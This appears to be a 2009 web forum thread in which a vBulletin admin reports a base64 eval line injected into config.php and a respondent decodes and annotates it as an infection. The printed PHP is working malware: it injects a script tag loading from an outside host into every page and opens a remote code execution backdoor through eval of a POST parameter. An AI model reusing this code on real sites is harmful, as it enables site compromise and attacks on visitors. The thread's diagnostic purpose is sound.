  1. #1
    Regular Coder

    problem in my vBulletin forum files, please help!

    Hello, I have a forum; I installed vBulletin 3.8.4 nulled by DGT on it...
    It was working very well, but after a couple of days the forum shut down with this error on the home page:
    Code:
    Fatal error: Cannot redeclare kch() (previously declared in /home/gongring/public_html/index.php(1) : eval()'d code:1) in /home/gong/public_html/includes/config.php(1) : eval()'d code on line 1
    and an error like it in the admin control panel too. Besides, when I checked the config.php file, I found it had been edited somehow and this code had been added to it!!

    Code:
    <?php eval(base64_decode('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')); ?>
    So I wonder: was this new function that causes the error added by a hacker? Or was this vBulletin version just not nulled very well and the function generated by the forum files themselves? Or maybe the files were edited somehow by the vBulletin team to disable the forum??
    Please, any ideas about the reason for this error and the reason the files were edited???
    Thanks
    Last edited by crazy.works; 10-31-2009 at 04:03 PM.
    Okay...

  • #2
    Fou-Lu (God Emperor)
    That code was likely injected:
    PHP Code:
    if(!isset($kch1))
    {
        // Output filter: strips competing injected <script>/<iframe> blocks from the
        // page, then inserts this infection's own <script src=...> tag.
        function kch($s)
        {
            if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
            foreach($a[0] as $v)
            if(count(explode("\n",$v))>5)
            {
                $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||
                preg_match('#[\(\[](\s*\d+,){20,}#',$v);
                if((preg_match('#\beval\b#',$v)&&
                        ($e||strpos($v,'fromCharCode')))||
                        ($e&&strpos($v,'document.write')))
                $s=str_replace($v,'',$s);
            }
            if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
            foreach($a[0] as $v)
            if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&
                    !strstr($v,'?'.'>'))
            $s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
            // Remove any earlier copy of its own tag, then re-add it once below.
            $s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2RyLW1oYXNoaW0uY29tL0NvbnRhY3RVcy9teWFsYnVtLnBocCA+PC9zY3JpcHQ+'),'',$s);
            // The above decodes to: <script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>
            if(stristr($s,'<body'))
            $s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
            elseif(strpos($s,',a'))
            $s.=$a;
            return $s;
        }
        // Installed as the PHP error handler: the first notice/warning raised anywhere
        // in the page triggers it, and it rewraps every open output buffer with kch()
        // so the script tag ends up in the final HTML regardless of how vBulletin renders.
        function kch2($a,$b,$c,$d)
        {
            global $kch1;
            $s=array();
            // Chain to whatever error handler was registered before this one.
            if(function_exists($kch1))
            call_user_func($kch1,$a,$b,$c,$d);
            foreach(@ob_get_status(1) as $v)
            if(($a=$v['name'])=='kch')
            return;           // already wrapped on this request
            elseif($a=='ob_gzhandler')
            break;
            else
            $s[]=array($a=='default output handler'?false:$a);
            // Unwind the existing buffers, keeping their handlers and content...
            for($i=count($s)-1;$i>=0;$i--)
            {
                $s[$i][1]=ob_get_contents();
                ob_end_clean();
            }
            // ...then rebuild the stack with kch() at the bottom.
            ob_start('kch');
            for($i=0;$i<count($s);$i++)
            {
                ob_start($s[$i][0]);
                echo $s[$i][1];
            }
        }
    }

    // Register the handler (remembering any previous one for chaining), then open a
    // remote code execution backdoor: POST parameter 'e' is base64-decoded and eval()'d.
    $kch1=(($a=@set_error_handler('kch2'))!='kch2')?$a:0;
    eval(base64_decode($_POST['e']));
    There is no reason for a built system to insert dynamic functions into itself.

    You'll need to scan your access logs to see where the vulnerability exists. Look closely at anything that came through a POST or PUT method to see where the data came from (it will likely appear as the base64 encoded chunk) and what script and action it took to get it in there.
    PHP Code:
    header('HTTP/1.1 420 Enhance Your Calm'); 

